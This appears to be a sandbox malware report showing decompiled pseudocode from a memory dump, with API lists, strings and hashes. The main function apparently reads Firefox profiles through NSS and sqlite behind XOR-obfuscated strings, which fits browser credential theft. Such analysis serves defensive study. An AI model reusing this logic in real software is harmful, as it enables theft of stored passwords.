							 *((char*)(_t414 - 4)) = 5;
							E001D2F2D(_t316);
							if( *((char*)(_t414 - 0x11)) != 0) {
								asm("movaps xmm0, [0x23d770]");
								_t376 = 0;
								asm("movups [ebp-0x5c], xmm0");
								do {
									 *(_t414 + _t376 - 0x5b) =  *(_t414 + _t376 - 0x5b) ^  *(_t414 - 0x5c);
									_t376 = _t376 + 1;
								} while (_t376 < 0xe);
								_push(_t316);
								 *((char*)(_t414 - 0x4d)) = 0;
								E001D3654(_t400, _t414 - 0xc8);
								 *(_t414 - 0x1c) = _t404 | 0x00000400;
								 *((char*)(_t414 - 4)) = 9;
								_t319 =  >=  ?  *((void*)(_t414 - 0xc8)) : _t414 - 0xc8;
								_t235 = L001F57CC( >=  ?  *((void*)(_t414 - 0xc8)) : _t414 - 0xc8, _t414 - 0x5b);
								 *((intOrPtr*)(_t414 - 0x98)) = 0;
								 *((intOrPtr*)(_t414 - 0x88)) = 0;
								 *((intOrPtr*)(_t414 - 0x84)) = 0xf;
								 *((char*)(_t414 - 0x98)) = 0;
								L001D2F8E(_t235);
								 *((char*)(_t414 - 4)) = 0xb;
								E001D2F2D(_t414 - 0xc8);
								_t378 = 9;
								E001F5BFA(_t414 - 0xf0, _t378, _t400,  *((intOrPtr*)(_t414 - 0xb4)) - 0x10);
								 *((char*)(_t414 - 4)) = 0xc;
								_t404 =  >=  ?  *((void*)(_t414 - 0xf0)) : _t414 - 0xf0;
								_t239 = E001F5C6D();
								_t379 =  >=  ?  *((void*)(_t414 - 0xf0)) : _t414 - 0xf0;
								_t240 = L001F57CC(_t239,  >=  ?  *((void*)(_t414 - 0xf0)) : _t414 - 0xf0);
								 *((intOrPtr*)(_t414 - 0xb0)) = 0;
								 *((intOrPtr*)(_t414 - 0xa0)) = 0;
								 *((intOrPtr*)(_t414 - 0x9c)) = 0xf;
								 *((char*)(_t414 - 0xb0)) = 0;
								L001D2F8E(_t240);
								 *((char*)(_t414 - 0x74)) = 0;
								_push( *((intOrPtr*)(_t414 - 0x74)));
								 *((char*)(_t414 - 4)) = 0xd;
								E001D4B70(_t414 - 0xb0);
								 *((char*)(_t414 - 0x78)) = 0;
								 *((char*)(_t414 - 4)) = 0xe;
								E001D4B70(_t414 - 0x98);
								 *((char*)(_t414 - 4)) = 0xf;
								E001CB1D6(0, _t414 - 0xc8, _t414 - 0x64,  *((intOrPtr*)(_t414 - 0x78)));
								E001D2D4F(_t414 - 0xc8);
								 *((char*)(_t414 - 4)) = 0xd;
								E001D2D4F(_t414 - 0x64);
								_t248 =  >=  ?  *((void*)(_t414 - 0xb0)) : _t414 - 0xb0;
								_push(_t414 - 0x40);
								_push( >=  ?  *((void*)(_t414 - 0xb0)) : _t414 - 0xb0);
								if( *((intOrPtr*)( *0x24c1cc))() == 0) {
									asm("movaps xmm0, [0x23d8a0]");
									_t338 = 0;
									asm("movups [ebp-0x17a], xmm0");
									 *((intOrPtr*)(_t414 - 0x11a)) = 0x3190218;
									asm("movaps xmm0, [0x23d870]");
									asm("movups [ebp-0x16a], xmm0");
									 *((intOrPtr*)(_t414 - 0x116)) = 0x57494b57;
									asm("movaps xmm0, [0x23d990]");
									asm("movups [ebp-0x15a], xmm0");
									 *((short*)(_t414 - 0x112)) = 0x47;
									asm("movaps xmm0, [0x23dc60]");
									asm("movups [ebp-0x14a], xmm0");
									asm("movaps xmm0, [0x23dc50]");
									asm("movups [ebp-0x13a], xmm0");
									asm("movaps xmm0, [0x23d940]");
									asm("movups [ebp-0x12a], xmm0");
									do {
										 *(_t414 + _t338 - 0x179) =  *(_t414 + _t338 - 0x179) ^  *(_t414 - 0x17a);
										_t338 = _t338 + 1;
									} while (_t338 < 0x68);
									 *((char*)(_t414 - 0x111)) = 0;
									_t256 =  *((intOrPtr*)( *0x24c1dc))( *((intOrPtr*)(_t414 - 0x40)), _t414 - 0x179, 0xffffffff, _t414 - 0x20, 0);
									_t418 = _t418 + 0x14;
									if(_t256 == 0) {
										while(1) {
											_push( *((intOrPtr*)(_t414 - 0x20)));
											if( *((intOrPtr*)( *0x24c1d0))() != 0x64) {
												goto L30;
											}
											_t263 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t414 - 0x20)), 0);
											_t410 = _t263;
											_t265 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t414 - 0x20)), 1);
											_t401 = _t265;
											_t267 =  *((intOrPtr*)( *0x24c1f0))( *((intOrPtr*)(_t414 - 0x20)), 2);
											_pop(_t350);
											 *((intOrPtr*)(_t414 - 0x44)) = _t267;
											E001D16B4(_t414 - 0x250);
											 *((char*)(_t414 - 4)) = 0x10;
											_t352 = 0;
											asm("movaps xmm0, [0x23db10]");
											asm("movups [ebp-0x5e], xmm0");
											 *((short*)(_t414 - 0x4e)) = 0x37;
											do {
												 *(_t414 + _t352 - 0x5d) =  *(_t414 + _t352 - 0x5d) ^  *(_t414 - 0x5e);
												_t352 = _t352 + 1;
												_t437 = _t352 - 0x10;
											} while (_t352 < 0x10);
											 *((char*)(_t414 - 0x4d)) = 0;
											_t353 = E001F5C6D();
											_t272 = L001F57CC(_t353, _t414 - 0x5d);
											_push(_t353);
											_push(_t353);
											E001D1624(_t414 - 0x250, _t437, _t272);
											_t385 = 0x19;
											 *((intOrPtr*)(_t414 - 0x18)) = 0x554b4c19;
											 *((short*)(_t414 - 0x14)) = 0x3923;
											_t355 = 0;
											 *((char*)(_t414 - 0x12)) = 0;
											while(1) {
												 *(_t414 + _t355 - 0x17) =  *(_t414 + _t355 - 0x17) ^ _t385;
												_t355 = _t355 + 1;
												if(_t355 >= 5) {
													break;
												}
												_t385 =  *((intOrPtr*)(_t414 - 0x18));
											}
											 *((char*)(_t414 - 0x12)) = 0;
											_t411 = L001F57CC(L001F57CC(0x23935b, _t414 - 0x17), _t410);
											 *((intOrPtr*)(_t414 - 0x2a)) = 0x614d040e;
											_t358 = 0xe;
											 *((intOrPtr*)(_t414 - 0x26)) = 0x347a607b;
											 *((short*)(_t414 - 0x22)) = 0x2e;
											_t388 = 0;
											while(1) {
												 *(_t414 + _t388 - 0x29) =  *(_t414 + _t388 - 0x29) ^ _t358;
												_t388 = _t388 + 1;
												__eflags = _t388 - 8;
												if(_t388 >= 8) {
													break;
												}
												_t358 =  *((intOrPtr*)(_t414 - 0x2a));
											}
											 *((char*)(_t414 - 0x21)) = 0;
											_t412 = L001F57CC(L001F57CC(_t411, _t414 - 0x29), _t401);
											 *((intOrPtr*)(_t414 - 0x39)) = 0x35185e54;
											_t361 = 0x54;
											 *((intOrPtr*)(_t414 - 0x35)) = 0x22742027;
											 *((intOrPtr*)(_t414 - 0x31)) = 0x203d273d;
											_t391 = 0;
											 *((short*)(_t414 - 0x2d)) = 0x746e;
											 *((char*)(_t414 - 0x2b)) = 0;
											while(1) {
												 *(_t414 + _t391 - 0x38) =  *(_t414 + _t391 - 0x38) ^ _t361;
												_t391 = _t391 + 1;
												__eflags = _t391 - 0xd;
												if(_t391 >= 0xd) {
													break;
												}
												_t361 =  *((intOrPtr*)(_t414 - 0x39));
											}
											 *((char*)(_t414 - 0x2b)) = 0;
											_t413 = L001F57CC(L001F57CC(_t412, _t414 - 0x38),  *((intOrPtr*)(_t414 - 0x44)));
											_t280 = E001D397D(0, 0x2485a0, _t401, 0x2485a0);
											 *((char*)(_t414 - 4)) = 0x11;
											__eflags =  *((intOrPtr*)(_t280 + 0x14)) - 0x10;
											if( *((intOrPtr*)(_t280 + 0x14)) >= 0x10) {
												_t280 =  *_t280;
											}
											_t281 = L001F57CC(_t413, _t280);
											 *((char*)(_t414 - 4)) = 0x10;
											_t404 = _t281;
											E001D2F2D(_t414 - 0xc8);
											E001D3B98(_t414 - 0x250, _t281);
											E001D15F4(_t414 - 0x250);
											 *((char*)(_t414 - 4)) = 0xd;
											E001D0602(_t414 - 0x250);
										}
									}
									L30:
									 *0x24c1fc( *((intOrPtr*)(_t414 - 0x20)));
									 *0x24c1ec( *((intOrPtr*)(_t414 - 0x40)));
									E001CB7A7(_t414 - 0xb0);
								}
								E001D2F2D(_t414 - 0xb0);
								E001D2F2D(_t414 - 0xf0);
								 *((char*)(_t414 - 4)) = 5;
								E001D2F2D(_t414 - 0x98);
							}
							 *0x24c1f4();
						}
					}
					 *((intOrPtr*)(_t414 - 4)) = 4;
					E001CACAE(0, _t414 - 0x6c, _t404, __eflags);
					_t404 =  *(_t414 - 0x68);
					_t398 =  *((intOrPtr*)(_t414 - 0x6c));
					_t212 =  *((intOrPtr*)(_t414 - 0x4c));
				}
				__eflags = _t404;
				if(_t404 != 0) {
					_t212 = E001C9597(_t404);
				}
				_t300 =  *(_t414 - 0x7c);
				__eflags =  *(_t414 - 0x7c);
				if( *(_t414 - 0x7c) != 0) {
					_t212 = E001C9597(_t300);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t414 - 0xc));
				return _t212;
			}

0x001e2683
0x001e2688
0x001e268d
0x001e2696
0x001e26a2
0x001e26a9
0x001e26ac
0x001e26de
0x001e26e3
0x001e26ec
0x001e26f5
0x001e26fa
0x001e2703
0x001e2706
0x001e270a
0x001e2715
0x001e2721
0x001e2726
0x001e2729
0x001e272c
0x001e272f
0x001e273c
0x001e2741
0x001e2747
0x001e274a
0x001e274f
0x001e2751
0x001e2754
0x001e2759
0x001e275b
0x001e2760
0x001e2760
0x001e2762
0x001e2766
0x001e276e
0x001e2771
0x001e2775
0x001e277e
0x001e2794
0x001e2799
0x001e279d
0x001e27ae
0x001e27b6
0x001e27bf
0x001e27c3
0x001e27c5
0x001e27cc
0x001e27d2
0x001e27d9
0x001e27db
0x001e27e2
0x001e27ef
0x001e27f6
0x001e27f7
0x001e27fc
0x001e2803
0x001e280c
0x001e2814
0x001e2817
0x001e281a
0x001e2831
0x001e2838
0x001e283d
0x001e2843
0x001e284c
0x001e284f
0x001e285b
0x001e286a
0x001e286d
0x001e2872
0x001e2878
0x001e287c
0x001e2885
0x001e288b
0x001e2892
0x001e2894
0x001e2898
0x001e289f
0x001e28a3
0x001e28a4
0x001e28a9
0x001e28b0
0x001e28b6
0x001e28c1
0x001e28c4
0x001e28d8
0x001e28df
0x001e28e4
0x001e28f1
0x001e28f7
0x001e2901
0x001e2907
0x001e2912
0x001e2916
0x001e291d
0x001e2924
0x001e2929
0x001e293a
0x001e2941
0x001e2946
0x001e294a
0x001e294f
0x001e295c
0x001e2962
0x001e296c
0x001e2972
0x001e2977
0x001e2980
0x001e2986
0x001e298a
0x001e2990
0x001e29a2
0x001e29a6
0x001e29af
0x001e29b9
0x001e29c4
0x001e29cc
0x001e29d0
0x001e29eb
0x001e29f2
0x001e29f3
0x001e29fa
0x001e2a00
0x001e2a07
0x001e2a09
0x001e2a10
0x001e2a1a
0x001e2a21
0x001e2a28
0x001e2a32
0x001e2a39
0x001e2a40
0x001e2a49
0x001e2a50
0x001e2a57
0x001e2a5e
0x001e2a65
0x001e2a6c
0x001e2a73
0x001e2a80
0x001e2a87
0x001e2a88
0x001e2a9f
0x001e2aa9
0x001e2aab
0x001e2ab0
0x001e2ab6
0x001e2ab6
0x001e2ac4
0x00000000
0x00000000
0x001e2ad3
0x001e2adc
0x001e2ae3
0x001e2aec
0x001e2af3
0x001e2af6
0x001e2afe
0x001e2b01
0x001e2b06
0x001e2b0a
0x001e2b0c
0x001e2b13
0x001e2b17
0x001e2b1d
0x001e2b24
0x001e2b28
0x001e2b29
0x001e2b29
0x001e2b2e
0x001e2b39
0x001e2b3b
0x001e2b40
0x001e2b41
0x001e2b49
0x001e2b4e
0x001e2b50
0x001e2b57
0x001e2b5d
0x001e2b5f
0x001e2b62
0x001e2b62
0x001e2b66
0x001e2b6a
0x00000000
0x00000000
0x001e2b6c
0x001e2b6c
0x001e2b74
0x001e2b8a
0x001e2b8c
0x001e2b93
0x001e2b95
0x001e2b9c
0x001e2ba2
0x001e2ba4
0x001e2ba4
0x001e2ba8
0x001e2ba9
0x001e2bac
0x00000000
0x00000000
0x001e2bae
0x001e2bae
0x001e2bb6
0x001e2bc9
0x001e2bcb
0x001e2bd2
0x001e2bd4
0x001e2bdb
0x001e2be2
0x001e2be4
0x001e2bea
0x001e2bed
0x001e2bed
0x001e2bf1
0x001e2bf2
0x001e2bf5
0x00000000
0x00000000
0x001e2bf7
0x001e2bf7
0x001e2bff
0x001e2c23
0x001e2c25
0x001e2c2b
0x001e2c2f
0x001e2c33
0x001e2c35
0x001e2c35
0x001e2c3b
0x001e2c46
0x001e2c4a
0x001e2c4c
0x001e2c59
0x001e2c64
0x001e2c6f
0x001e2c73
0x001e2c73
0x001e2ab6
0x001e2c7d
0x001e2c80
0x001e2c8a
0x001e2c97
0x001e2c97
0x001e2ca2
0x001e2cad
0x001e2cb8
0x001e2cbc
0x001e2cbc
0x001e2cc1
0x001e2cc1
0x001e27cc
0x001e2ceb
0x001e2cf2
0x001e2cf7
0x001e2cfa
0x001e2cfd
0x001e2cfd
0x001e2d05
0x001e2d07
0x001e2d0b
0x001e2d0b
0x001e2d10
0x001e2d13
0x001e2d15
0x001e2d17
0x001e2d17
0x001e2d21
0x001e2d2a

APIs

__EH_prolog.LIBCMT ref: 001E2688
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 001E26AC

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001CAC66: __EH_prolog.LIBCMT ref: 001CAC6B

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

NSS_Init.NSS3(?,?,?,?,?,?), ref: 001E27B6

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001F5C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 001F5CB7

sqlite3_finalize.NSS3(?,?,00000001,?,?,?), ref: 001E2C80
sqlite3_close.NSS3(?), ref: 001E2C8A
NSS_Shutdown.NSS3 ref: 001E2CC1

Strings

7, xrefs: 001E2B17
G, xrefs: 001E2A40
nt, xrefs: 001E2BE4
#9, xrefs: 001E2B57
., xrefs: 001E2B9C
' t", xrefs: 001E2BD4
='= , xrefs: 001E2BDB
{`z4, xrefs: 001E2B95
WKIW, xrefs: 001E2A28
Profiles, xrefs: 001E26BE

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Deallocate$EnvironmentFolderInitPathShutdownVariablesqlite3_closesqlite3_finalize
String ID: #9$' t"$.$7$='= $G$Profiles$WKIW$nt${`z4
API String ID: 2012916387-686067381
Opcode ID: 268499c0b516796c6f570b67972dee4390866562ad2a4bce028cba22de694efb
Instruction ID: 2ce0ca446fe2778ae9b9301d18b91b16edc8e0817d8f15c262071dd62ff1b82a
Opcode Fuzzy Hash: 268499c0b516796c6f570b67972dee4390866562ad2a4bce028cba22de694efb
Instruction Fuzzy Hash: EE12CA30D04298CADF25DBA8DC95BEDBBB5AF69300F1041AAE40977252EB705F89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00221978, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00221978(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x247140) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00217FE3(_t46);
							E00220D14( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00217FE3(_t47);
							E002211C9( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00217FE3( *((intOrPtr*)(_t74 + 0x7c)));
						E00217FE3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00217FE3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00217FE3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00217FE3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00217FE3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00221AE9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x2472d0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00217FE3(_t31);
							E00217FE3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00217FE3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00217FE3(_t74);
			}

0x00221980
0x00221984
0x0022198c
0x00221995
0x0022199a
0x002219a1
0x002219a9
0x002219b1
0x002219bc
0x002219c2
0x002219c3
0x002219cb
0x002219d3
0x002219de
0x002219e4
0x002219e8
0x002219f3
0x002219f9
0x0022199a
0x002219fa
0x00221a02
0x00221a15
0x00221a28
0x00221a36
0x00221a41
0x00221a46
0x00221a4f
0x00221a57
0x00221a58
0x00221a5e
0x00221a61
0x00221a64
0x00221a6b
0x00221a6d
0x00221a71
0x00221a79
0x00221a80
0x00221a86
0x00221a87
0x00221a87
0x00221a8e
0x00221a90
0x00221a95
0x00221a9d
0x00221aa2
0x00221aa3
0x00221aa3
0x00221aa6
0x00221aa9
0x00221aac
0x00221aaf
0x00221aaf
0x00221abf

APIs

___free_lconv_mon.LIBCMT ref: 002219BC

Part of subcall function 00220D14: _free.LIBCMT ref: 00220D31
Part of subcall function 00220D14: _free.LIBCMT ref: 00220D43
Part of subcall function 00220D14: _free.LIBCMT ref: 00220D55
Part of subcall function 00220D14: _free.LIBCMT ref: 00220D67
Part of subcall function 00220D14: _free.LIBCMT ref: 00220D79
Part of subcall function 00220D14: _free.LIBCMT ref: 00220D8B
Part of subcall function 00220D14: _free.LIBCMT ref: 00220D9D
Part of subcall function 00220D14: _free.LIBCMT ref: 00220DAF
Part of subcall function 00220D14: _free.LIBCMT ref: 00220DC1
Part of subcall function 00220D14: _free.LIBCMT ref: 00220DD3
Part of subcall function 00220D14: _free.LIBCMT ref: 00220DE5
Part of subcall function 00220D14: _free.LIBCMT ref: 00220DF7
Part of subcall function 00220D14: _free.LIBCMT ref: 00220E09

_free.LIBCMT ref: 002219B1

Part of subcall function 00217FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?), ref: 00217FF9
Part of subcall function 00217FE3: GetLastError.KERNEL32(?,?,0022146B,?,00000000,?,4hU@[Y]W,?,0022170E,?,00000007,?,?,00221B0F,?,?), ref: 0021800B

_free.LIBCMT ref: 002219D3
_free.LIBCMT ref: 002219E8
_free.LIBCMT ref: 002219F3
_free.LIBCMT ref: 00221A15
_free.LIBCMT ref: 00221A28
_free.LIBCMT ref: 00221A36
_free.LIBCMT ref: 00221A41
_free.LIBCMT ref: 00221A79
_free.LIBCMT ref: 00221A80
_free.LIBCMT ref: 00221A9D
_free.LIBCMT ref: 00221AB5

Strings

@q$, xrefs: 0022198E
4hU@[Y]W, xrefs: 0022197E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 4hU@[Y]W$@q$
API String ID: 161543041-3599605931
Opcode ID: dc92eb9292fc4d1342513fc4653c577db5e34192aacdaba67e1de99f77c873ec
Instruction ID: 2bc6f6646e141560d6e2852a7b1d01ff8fe033477469fd86afe4872cab644a82
Opcode Fuzzy Hash: dc92eb9292fc4d1342513fc4653c577db5e34192aacdaba67e1de99f77c873ec
Instruction Fuzzy Hash: B6315E31628312AFEB209EB8E805F9B73F9EF60310F214519E059D6191DF70ADB1CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0020EA63, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0020EA63(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, char* _a24) {
				char _v0;
				signed int _v8;
				char _v12;
				char _v16;
				char _v532;
				signed int _v536;
				signed int _v540;
				WCHAR* _v544;
				signed int _v548;
				intOrPtr* _v552;
				WCHAR* _v556;
				intOrPtr _v576;
				intOrPtr* _v580;
				intOrPtr* _v584;
				intOrPtr* _v588;
				intOrPtr* _v592;
				intOrPtr* _v596;
				void* __ebp;
				signed int _t93;
				void* _t97;
				void* _t101;
				signed int _t102;
				void* _t119;
				void* _t121;
				void* _t122;
				signed int _t127;
				struct HINSTANCE__* _t129;
				intOrPtr _t131;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				intOrPtr _t142;
				void* _t146;
				void* _t147;
				void* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t161;
				void* _t162;
				signed int _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				char* _t170;
				char* _t171;
				void* _t174;
				void* _t175;
				char* _t177;
				char* _t178;
				void* _t180;
				void* _t182;
				void* _t183;
				signed int _t185;
				void* _t186;
				void* _t187;
				void* _t189;
				void* _t194;
				signed int _t195;
				WCHAR* _t198;
				intOrPtr* _t199;
				signed int _t201;
				intOrPtr* _t203;
				intOrPtr* _t205;
				intOrPtr* _t208;
				void* _t212;
				void* _t216;
				intOrPtr* _t217;
				void* _t219;
				signed int _t220;
				char _t222;
				void* _t223;
				signed short* _t225;
				intOrPtr* _t227;
				void* _t228;
				signed int _t230;
				void* _t231;
				signed int _t235;
				void* _t237;
				void* _t238;
				void* _t241;

				_t215 = __edx;
				_t230 = _t235;
				_t93 =  *0x247050; // 0xc1fc8d92
				_v8 = _t93 ^ _t230;
				_push(__ebx);
				_t191 = _a24;
				_push(__esi);
				_t227 = _a4;
				_push(__edi);
				_t222 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t97 = E00219DBB(_t227, _t222, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t237 = _t235 - 0x228 + 0xc;
				if(_t97 != 0) {
					L66:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					L002067FE();
					asm("int3");
					_push(_t230);
					_t231 = _t237;
					_push(_t198);
					_push(_t198);
					L0020EFF0(_t191, _t222, _t227, _v584, _v580, _v576);
					_t101 = E00205504(2);
					_t238 = _t237 + 0x10;
					_t102 =  *(_t101 + 0xc);
					__eflags = _t102 & 0x000004c0;
					if((_t102 & 0x000004c0) == 0) {
						_push(0);
						_push(4);
						_t119 = E00205504(2);
						_t198 = 0;
						_push(_t119);
						E002059D3(_t191, _t222, _t227);
						_t238 = _t238 + 0x10;
					}
					_push(0);
					_v12 = E0020F09F();
					_v16 = E00205504(2);
					_push( &_a8);
					_push( &_a4);
					_push( &_v0);
					L70();
					E00205111(_t191, _t198, _t222, _t227, E00205504(2));
					E00212B29(_t191, _t198, _t215, _t222, _t227,  &_v16,  &_v12);
					asm("int3");
					_push(_t231);
					_push( *_v580);
					_push( *_v584);
					return E0020F141( *_v596,  *_v592,  *_v588);
				} else {
					_t121 = E0021C294(_t227, _t222, L"\n\n");
					_t237 = _t237 + 0xc;
					if(_t121 != 0) {
						goto L66;
					} else {
						_t122 = E0021C294(_t227, _t222, L"Program: ");
						_t237 = _t237 + 0xc;
						if(_t122 != 0) {
							goto L66;
						} else {
							E00202C70(_t222,  &_v532, _t122, 0x20a);
							_t241 = _t237 + 0xc;
							_v548 = 0;
							_t127 =  *0x22d208(6, _t191,  &_v548);
							_t198 =  &_v532;
							_t191 = 0x105;
							asm("sbb eax, eax");
							_t129 =  ~_t127 & _v548;
							_v548 = _t129;
							if(GetModuleFileNameW(_t129, _t198, 0x105) != 0) {
								L6:
								_t191 =  &_v532;
								_t199 =  &_v532;
								_t215 = _t199 + 2;
								do {
									_t131 =  *_t199;
									_t199 = _t199 + 2;
								} while (_t131 != _v540);
								_t198 = _t199 - _t215 >> 1;
								if( &(_t198[5]) <= 0x40) {
									L10:
									_t133 = E0021C294(_t227, _t222, _t191);
									_t237 = _t241 + 0xc;
									if(_t133 != 0) {
										goto L66;
									} else {
										_t134 = E0021C294(_t227, _t222, "\n");
										_t237 = _t237 + 0xc;
										if(_t134 != 0) {
											goto L66;
										} else {
											_t135 = E0021C294(_t227, _t222, L"File: ");
											_t237 = _t237 + 0xc;
											if(_t135 != 0) {
												goto L66;
											} else {
												_t215 = _v536;
												_t201 = _t215;
												_t191 = _t201 + 2;
												do {
													_t136 =  *_t201;
													_t201 = _t201 + 2;
												} while (_t136 != _v540);
												_t198 = _t201 - _t191 >> 1;
												if( &(_t198[4]) <= 0x40) {
													_push(_t215);
													goto L35;
												} else {
													_t195 = _t215;
													_t212 = _t195 + 2;
													do {
														_t162 =  *_t195;
														_t195 = _t195 + 2;
													} while (_t162 != _v540);
													_v544 = 0x5c;
													_t191 = _t195 - _t212 >> 1;
													_t198 = 1;
													_t163 =  *(_t215 + _t191 * 2 - 2) & 0x0000ffff;
													if(_t163 != _v544) {
														_v556 = _t163;
														_t225 = _t215 - 2 + _t191 * 2;
														_t220 = _t163;
														while(_t220 != 0x2f && _t198 < _t191) {
															_t225 = _t225 - 2;
															_t198 =  &(_t198[0]);
															_t185 =  *_t225 & 0x0000ffff;
															_t220 = _t185;
															if(_t185 != _v544) {
																continue;
															}
															break;
														}
														_t222 = _a8;
														_t215 = _v536;
													}
													_t165 = _t191 - _t198;
													_v544 = _t165;
													if(_t165 <= 0x26) {
														L30:
														if(__eflags >= 0) {
															_push(0x23);
															_t166 = E0021C3F0(_t198, _t227, _t222, _t215);
															_t237 = _t237 + 0x10;
															__eflags = _t166;
															if(_t166 != 0) {
																goto L66;
															} else {
																_t167 = E0021C294(_t227, _t222, L"...");
																_t237 = _t237 + 0xc;
																__eflags = _t167;
																if(_t167 != 0) {
																	goto L66;
																} else {
																	_t198 = _v544;
																	_push(8);
																	_t170 = E0021C3F0(_t198, _t227, _t222, _v536 + _t198 * 2);
																	_t237 = _t237 + 0x10;
																	__eflags = _t170;
																	if(_t170 != 0) {
																		goto L66;
																	} else {
																		_t171 = E0021C294(_t227, _t222, L"...");
																		_t237 = _t237 + 0xc;
																		__eflags = _t171;
																		if(_t171 != 0) {
																			goto L66;
																		} else {
																			_t174 = _v536 + _t191 * 2 + 0xfffffff2;
																			goto L34;
																		}
																	}
																}
															}
														} else {
															_t175 = 0x35;
															_t198 = _t198 >> 1;
															_v556 = _t198;
															_push(_t175 - _t198);
															_t177 = E0021C3F0(_t198, _t227, _t222, _t215);
															_t237 = _t237 + 0x10;
															__eflags = _t177;
															if(_t177 != 0) {
																goto L66;
															} else {
																_t178 = E0021C294(_t227, _t222, L"...");
																_t237 = _t237 + 0xc;
																__eflags = _t178;
																if(_t178 != 0) {
																	goto L66;
																} else {
																	_t191 = _t191 - _v556;
																	__eflags = _t191;
																	_t174 = _v536 + _t191 * 2;
																	goto L34;
																}
															}
														}
													} else {
														if(_t198 >= 0x12) {
															__eflags = _t165 - 0x26;
															goto L30;
														} else {
															_t180 = 0x35;
															_push(_t180 - _t198);
															_t182 = E0021C3F0(_t198, _t227, _t222, _t215);
															_t237 = _t237 + 0x10;
															if(_t182 != 0) {
																goto L66;
															} else {
																_t183 = E0021C294(_t227, _t222, L"...");
																_t237 = _t237 + 0xc;
																if(_t183 != 0) {
																	goto L66;
																} else {
																	_t198 = _v544;
																	_t174 = _v536 + _t198 * 2;
																	L34:
